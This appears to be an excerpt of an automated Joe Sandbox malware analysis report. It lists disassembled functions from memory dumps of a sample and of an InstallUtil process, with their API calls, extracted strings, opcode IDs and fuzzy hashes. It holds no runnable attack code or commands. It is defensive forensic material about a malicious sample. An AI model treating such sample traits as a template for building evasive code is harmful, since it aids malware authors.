                            • std::_Lockit::~_Lockit.LIBCPMT ref: 0132520D
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_Register
                            • String ID:
                            • API String ID: 459529453-0
                            • Opcode ID: 7e28ca3c9a95c090ebf0f8f6682c38540281473c552b72dafae7c652949986dc
                            • Instruction ID: e445871f418f81a9c2cb2d7c80639664d52a2027f46a6346e1bc8c397f6302c2
                            • Opcode Fuzzy Hash: 7e28ca3c9a95c090ebf0f8f6682c38540281473c552b72dafae7c652949986dc
                            • Instruction Fuzzy Hash: 5231F4725013268FCB31FF18D88096AB7A1FF94628F15050DE8496B262D730FE09CBD2
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog3.LIBCMT ref: 01328177
                            • std::_Lockit::_Lockit.LIBCPMT ref: 01328181
                              • Part of subcall function 01321A30: std::_Lockit::_Lockit.LIBCPMT ref: 01321A4C
                              • Part of subcall function 01321A30: std::_Lockit::~_Lockit.LIBCPMT ref: 01321A69
                            • codecvt.LIBCPMT ref: 013281BB
                            • std::_Facet_Register.LIBCPMT ref: 013281D2
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 013281F2
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                            • String ID:
                            • API String ID: 712880209-0
                            • Opcode ID: 40b59fed227d7e6f1a6f26126f9b6f709edd38159957de37000f50429599b977
                            • Instruction ID: aa96325d70873f1f9b5ea9feed682981716f67d9e90b5678a2cb90a0af9c0e71
                            • Opcode Fuzzy Hash: 40b59fed227d7e6f1a6f26126f9b6f709edd38159957de37000f50429599b977
                            • Instruction Fuzzy Hash: 2501D2319002369FCB15FBACC844AAE7FB5BF60728F240589D8056B3D0DF70AA008790
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __EH_prolog3.LIBCMT ref: 013268D9
                            • std::_Lockit::_Lockit.LIBCPMT ref: 013268E3
                              • Part of subcall function 01321A30: std::_Lockit::_Lockit.LIBCPMT ref: 01321A4C
                              • Part of subcall function 01321A30: std::_Lockit::~_Lockit.LIBCPMT ref: 01321A69
                            • codecvt.LIBCPMT ref: 0132691D
                            • std::_Facet_Register.LIBCPMT ref: 01326934
                            • std::_Lockit::~_Lockit.LIBCPMT ref: 01326954
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: std::_$Lockit$Lockit::_Lockit::~_$Facet_H_prolog3Registercodecvt
                            • String ID:
                            • API String ID: 712880209-0
                            • Opcode ID: eceb4184c58b403e327f0c8fe69987a52de8fdd502ac5b6504251081efb0d230
                            • Instruction ID: 0eb1dd94d111f3d666d4163a55939fa8f843ddfc6573e625d78cc4757f03bd6e
                            • Opcode Fuzzy Hash: eceb4184c58b403e327f0c8fe69987a52de8fdd502ac5b6504251081efb0d230
                            • Instruction Fuzzy Hash: 9501D271E002369FCB15FB68C555AAE7B75AF5076CF240509D801AB390DF70AE048B90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • ___std_exception_copy.LIBVCRUNTIME ref: 0132215D
                              • Part of subcall function 0132A8B0: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,00000000,?,013267B6,?,01354BA0,?,?,?,ios_base::failbit set), ref: 0132A910
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExceptionRaise___std_exception_copy
                            • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                            • API String ID: 3109751735-1866435925
                            • Opcode ID: 6c4bcec0a9c9c44b0f3639795052fd62bef16fec833625b3d626ab15e8726a6a
                            • Instruction ID: 574b491ad71b58b688f6bdd28245b78eb1f36f66acd36324a88b25d57b6305ac
                            • Opcode Fuzzy Hash: 6c4bcec0a9c9c44b0f3639795052fd62bef16fec833625b3d626ab15e8726a6a
                            • Instruction Fuzzy Hash: 5911E4B6900715ABC710EF5CCC01F96BBE8BF15218F04C91AEA5897640F774E558CBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,0132DF33,00000000,?,0145A95C,?,?,?,0132E0D6,00000004,InitializeCriticalSectionEx,01349CE8,InitializeCriticalSectionEx), ref: 0132DF8F
                            • GetLastError.KERNEL32(?,0132DF33,00000000,?,0145A95C,?,?,?,0132E0D6,00000004,InitializeCriticalSectionEx,01349CE8,InitializeCriticalSectionEx,00000000,?,0132DE8D), ref: 0132DF99
                            • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 0132DFC1
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: LibraryLoad$ErrorLast
                            • String ID: api-ms-
                            • API String ID: 3177248105-2084034818
                            • Opcode ID: 5131509da94d8e45e89959edc78a8c7dd3fc9cd7e10ff9b7ee5031f113de9996
                            • Instruction ID: 247476e5a05b0b061a80d403be69b7fb228503f12ea01c26acf08480463a379e
                            • Opcode Fuzzy Hash: 5131509da94d8e45e89959edc78a8c7dd3fc9cd7e10ff9b7ee5031f113de9996
                            • Instruction Fuzzy Hash: 73E04F34294204B7EF217AE5EC06F193F58AB01B49F104060FD0CE8495DB61E5689A8C
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetConsoleOutputCP.KERNEL32(51F7B458,00000000,00000000,?), ref: 0133A291
                              • Part of subcall function 0133ECDB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,0133D3AA,?,00000000,-00000008), ref: 0133ED87
                            • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 0133A4EC
                            • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 0133A534
                            • GetLastError.KERNEL32 ref: 0133A5D7
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                            • String ID:
                            • API String ID: 2112829910-0
                            • Opcode ID: e95ad45c8ee54167dafa96199fd04851b9bd134187ec15cd791574ea2b537e12
                            • Instruction ID: c41ecc9e89094aa95ea6504ef3cdf2bb19a36223c07355ecc3141d169a432f2e
                            • Opcode Fuzzy Hash: e95ad45c8ee54167dafa96199fd04851b9bd134187ec15cd791574ea2b537e12
                            • Instruction Fuzzy Hash: 5AD18AB5D00248DFDF15CFA8D8809ADBBB5FF48318F18412AE996EB341E730A945CB54
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 0133ECDB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,0133D3AA,?,00000000,-00000008), ref: 0133ED87
                            • GetLastError.KERNEL32 ref: 0133F15B
                            • __dosmaperr.LIBCMT ref: 0133F162
                            • GetLastError.KERNEL32(?,?,?,?), ref: 0133F19C
                            • __dosmaperr.LIBCMT ref: 0133F1A3
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                            • String ID:
                            • API String ID: 1913693674-0
                            • Opcode ID: 77cbb61af2ef8975b6c7c616cf395401c4ec6918a6a2f36573055f66f641286a
                            • Instruction ID: c1a2c9cdf0dd50e93a94a134b8a4ac3b611c73bf1b4b5f64ca8d482eafbc3a2c
                            • Opcode Fuzzy Hash: 77cbb61af2ef8975b6c7c616cf395401c4ec6918a6a2f36573055f66f641286a
                            • Instruction Fuzzy Hash: FB21AA71F00606AFDB21AF79EC8086BB7ADEFC526C7404519F81597541D731EC418799
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 6d127631b6a3039c734eb14d246d4a7b961b6f3ad2ff811b7a3ad4f42d53710f
                            • Instruction ID: 00eef3a9376137a08a11e0421be660a8901fa15eb44351a9957d45042e3ecd29
                            • Opcode Fuzzy Hash: 6d127631b6a3039c734eb14d246d4a7b961b6f3ad2ff811b7a3ad4f42d53710f
                            • Instruction Fuzzy Hash: 7021A879B00A06AFDB21AF79DC8086BB7ADEFE026C7004525F925D7560DB31ED80C768
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetEnvironmentStringsW.KERNEL32(00000000,?,?,?,013348AD,00000000,01334880,01334B1E,01329C23,01354E48,00000014), ref: 01340095
                              • Part of subcall function 0133ECDB: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,?,0000FDE9,00000000,-00000008,00000000,?,0133D3AA,?,00000000,-00000008), ref: 0133ED87
                            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 013400CD
                            • FreeEnvironmentStringsW.KERNEL32(00000000,00000000), ref: 013400ED
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                            • String ID:
                            • API String ID: 158306478-0
                            • Opcode ID: 402c39cdfb6635f052e5e9b728e940bb44e0ce35e9883e1fa21ab0c2fd3daba5
                            • Instruction ID: 938c0da21c8c8afbb16e70259cd768d2be7265e051edc8beee4b78630d9e86a2
                            • Opcode Fuzzy Hash: 402c39cdfb6635f052e5e9b728e940bb44e0ce35e9883e1fa21ab0c2fd3daba5
                            • Instruction Fuzzy Hash: B01196F560151ABFE72537B99C89CFF79DCEE992AC7000125FA05E1100FE64ED0146B9
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,00000000,?,01344AF7,00000000,00000001,00000000,?,?,0133A62B,?,00000000,00000000), ref: 0134661D
                            • GetLastError.KERNEL32(?,01344AF7,00000000,00000001,00000000,?,?,0133A62B,?,00000000,00000000,?,?,?,0133ABB2,?), ref: 01346629
                              • Part of subcall function 013465EF: CloseHandle.KERNEL32(FFFFFFFE,01346639,?,01344AF7,00000000,00000001,00000000,?,?,0133A62B,?,00000000,00000000,?,?), ref: 013465FF
                            • ___initconout.LIBCMT ref: 01346639
                              • Part of subcall function 013465B1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,013465E0,01344AE4,?,?,0133A62B,?,00000000,00000000,?), ref: 013465C4
                            • WriteConsoleW.KERNEL32(00000000,00000000,?,00000000,?,01344AF7,00000000,00000001,00000000,?,?,0133A62B,?,00000000,00000000,?), ref: 0134664E
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                            • String ID:
                            • API String ID: 2744216297-0
                            • Opcode ID: 6c9dc9ffdbab53fc71813b55c0f9d1e4d57cbad0af24811c8c05aa415b8c4a20
                            • Instruction ID: 172fd4524a30bb6399ef02947f7353a9075668699dea0c8bf1c63d8688aeba31
                            • Opcode Fuzzy Hash: 6c9dc9ffdbab53fc71813b55c0f9d1e4d57cbad0af24811c8c05aa415b8c4a20
                            • Instruction Fuzzy Hash: 56F030B6510119FBCF722FE5EC069893F6AFB097B4F408050FE1985124CA32A960EFD4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • __startOneArgErrorHandling.LIBCMT ref: 01333C2D
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: ErrorHandling__start
                            • String ID: pow
                            • API String ID: 3213639722-2276729525
                            • Opcode ID: a365e3149297f2098c4a5885e59b666fb08fb5f1b4f0fa73f23f0e9d8a628412
                            • Instruction ID: ef4efa6516ee6f6715f5865135812bf91ae4e5f24e2b944627eadf731cc1a662
                            • Opcode Fuzzy Hash: a365e3149297f2098c4a5885e59b666fb08fb5f1b4f0fa73f23f0e9d8a628412
                            • Instruction Fuzzy Hash: C8517F61E0920696EF26771DC90037A6F98BBC0758F24CD79E0D1422E9EF3984D59B4E
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • ___std_exception_copy.LIBVCRUNTIME ref: 0132215D
                              • Part of subcall function 0132A8B0: RaiseException.KERNEL32(E06D7363,00000001,00000003,?,?,00000000,?,013267B6,?,01354BA0,?,?,?,ios_base::failbit set), ref: 0132A910
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: ExceptionRaise___std_exception_copy
                            • String ID: ios_base::badbit set$ios_base::failbit set
                            • API String ID: 3109751735-1240500531
                            • Opcode ID: d99aa70859b9c488328d9866721e82ef5f9d695b7bb1826cfffc289312954df3
                            • Instruction ID: ad6aad80ebd112cb53b92439fa194afa634cf0b98abfb3cf06a9fbff5543c942
                            • Opcode Fuzzy Hash: d99aa70859b9c488328d9866721e82ef5f9d695b7bb1826cfffc289312954df3
                            • Instruction Fuzzy Hash: 1F414676504315AFC318EF2CCC40AABBBE9EF99218F14CA1EF95487640E734E945CB92
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • ___except_validate_context_record.LIBVCRUNTIME ref: 0132CC7F
                            • __IsNonwritableInCurrentImage.LIBCMT ref: 0132CD33
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: CurrentImageNonwritable___except_validate_context_record
                            • String ID: csm
                            • API String ID: 3480331319-1018135373
                            • Opcode ID: 3c35d4075a9a987d7a03ab2be7872ca819447f074baa23409ce5a0e491f8bc68
                            • Instruction ID: 102e559a9f0e3d85405c8d1e0c96169eba60620a1b625e3f47573c249b1bda14
                            • Opcode Fuzzy Hash: 3c35d4075a9a987d7a03ab2be7872ca819447f074baa23409ce5a0e491f8bc68
                            • Instruction Fuzzy Hash: 95418334A002299BCF10EF6CC884A9EBFB5BF5532CF148155E919AB351D771E916CBD0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • EncodePointer.KERNEL32(00000000,?), ref: 0132D572
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.239697555.0000000001321000.00000020.00000001.01000000.00000003.sdmp, Offset: 01320000, based on PE: true
                            • Associated: 00000000.00000002.239694845.0000000001320000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239702546.0000000001348000.00000002.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239705646.0000000001356000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.239725948.000000000145C000.00000002.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_1320000_a9rLzLY498.jbxd
                            Yara matches
                            Similarity
                            • API ID: EncodePointer
                            • String ID: MOC$RCC
                            • API String ID: 2118026453-2084237596
                            • Opcode ID: 95968ac41cf4bf9d98f772b9fedd79bbaa1bce30382b2845e599dfdba71ec0a3
                            • Instruction ID: 7a25ca06e2ef270eb3091e2565534966531066f46006d066851654d0198ba364
                            • Opcode Fuzzy Hash: 95968ac41cf4bf9d98f772b9fedd79bbaa1bce30382b2845e599dfdba71ec0a3
                            • Instruction Fuzzy Hash: 09417A71900219EFDF26EF98CC80AEEBBB5FF48318F188059FA08A7251D3359A50DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.254144638.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_29c0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID: "$4'Jq$LRJq$PlJq$[$[$\$]$]$u${${$}$}$$Jq$$Jq$cJq$cJq
                            • API String ID: 0-2015809238
                            • Opcode ID: 26bc45a2dbb9473da1e23ed9e6a7ab37e63bff54ef25f1c1897776bc0fe113ae
                            • Instruction ID: a1b9203dfed0628c4178af008a4abcedd2c1156bcc3b713776256b566b53bdbd
                            • Opcode Fuzzy Hash: 26bc45a2dbb9473da1e23ed9e6a7ab37e63bff54ef25f1c1897776bc0fe113ae
                            • Instruction Fuzzy Hash: 6EB29E74905228CFDB65DF29C888BADBBB6BB49305F2485EAD40DA7250DB309EC1CF41
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.254144638.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_29c0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID: "$"$-$[$]${$}
                            • API String ID: 0-2220975799
                            • Opcode ID: bf8a8c1a9d1c1c83e9b42ebf5aa279bcdf4675acff1e97020f4e15f8517f4f39
                            • Instruction ID: e0af3c2ed732d5dc003c749025c67496ed70803e62a5bef71f1d385adf14430f
                            • Opcode Fuzzy Hash: bf8a8c1a9d1c1c83e9b42ebf5aa279bcdf4675acff1e97020f4e15f8517f4f39
                            • Instruction Fuzzy Hash: 2122AE74D05229CFDB64DFA9C940BADBBB2AB89300F2085EAD409B7255DB359E81CF50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.254144638.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_29c0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID: fOq$U
                            • API String ID: 0-3532095693
                            • Opcode ID: 0974ff3c9f3ac667fdfe157b43e70fbf0df925dc61a1cb07151a02e411caa1f9
                            • Instruction ID: 65f3cc53766682ad184729248b593bfff583452b711d20ee46fb4f5b3c2452b5
                            • Opcode Fuzzy Hash: 0974ff3c9f3ac667fdfe157b43e70fbf0df925dc61a1cb07151a02e411caa1f9
                            • Instruction Fuzzy Hash: A1A2B274A01228CFDB64DF68C894AE9BBB6BF49304F1485E9D40DAB355DB31AE81CF41
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Memory Dump Source
                            • Source File: 00000003.00000002.254144638.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_29c0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 11710e2fe67d1f582f8a77b3c4378453ea1ecdfd75053ceb500eee6594d65cbf
                            • Instruction ID: 02904c13fe6290e280ae6f3b76cf6f1d13333c47489891996ef26628c32e6290
                            • Opcode Fuzzy Hash: 11710e2fe67d1f582f8a77b3c4378453ea1ecdfd75053ceb500eee6594d65cbf
                            • Instruction Fuzzy Hash: DE31C875E046688FDB28CF2AD9447D9BBF2AFC9311F04C1AAD448AB264DB344985CF41
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.254144638.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_29c0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID: "$LRJq$xN$F
                            • API String ID: 0-2468038908
                            • Opcode ID: 423ddd6deaa6fb8293df60a5f4c3b489385db9933b33dad0496e83f8621d44ea
                            • Instruction ID: ffdb3c5f4d73497b73a75c652b55b58bc297c773b443fc42f79a10ccf7ea0f84
                            • Opcode Fuzzy Hash: 423ddd6deaa6fb8293df60a5f4c3b489385db9933b33dad0496e83f8621d44ea
                            • Instruction Fuzzy Hash: 52A1F271A012188FDB15DFA8C4547EDBBF2EF88314F249469D01ABB3A5CB349985CF91
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.254144638.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_29c0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID: @$@$$Jq$$Jq
                            • API String ID: 0-2354576926
                            • Opcode ID: 07404f5430170f98a1dfb9e84deaf85b7ab2f08011c6077dc37e4d71c8cf13a7
                            • Instruction ID: 412c58ae2040e6e6d3e764cc65e0f41dc5555fbcc70a308060fe199f0bc6dc96
                            • Opcode Fuzzy Hash: 07404f5430170f98a1dfb9e84deaf85b7ab2f08011c6077dc37e4d71c8cf13a7
                            • Instruction Fuzzy Hash: 3691AB74E00319CFDB64DFA9C984BADBBB2BF49304F2084AAD409AB355DB345A85CF51
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.254144638.00000000029C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 029C0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_29c0000_InstallUtil.jbxd
                            Similarity
                            • API ID:
                            • String ID: $Jq$$Jq$$Jq$$Jq
                            • API String ID: 0-2450533605
                            • Opcode ID: f8a5cde333d59accd2baf92fa87767e8c51bed714c2e1bedb0add05f3115d7dc
                            • Instruction ID: c6bfcffeb2d986082b16277db7d11265a05251ce14ff6052f493a2c60188b226
                            • Opcode Fuzzy Hash: f8a5cde333d59accd2baf92fa87767e8c51bed714c2e1bedb0add05f3115d7dc
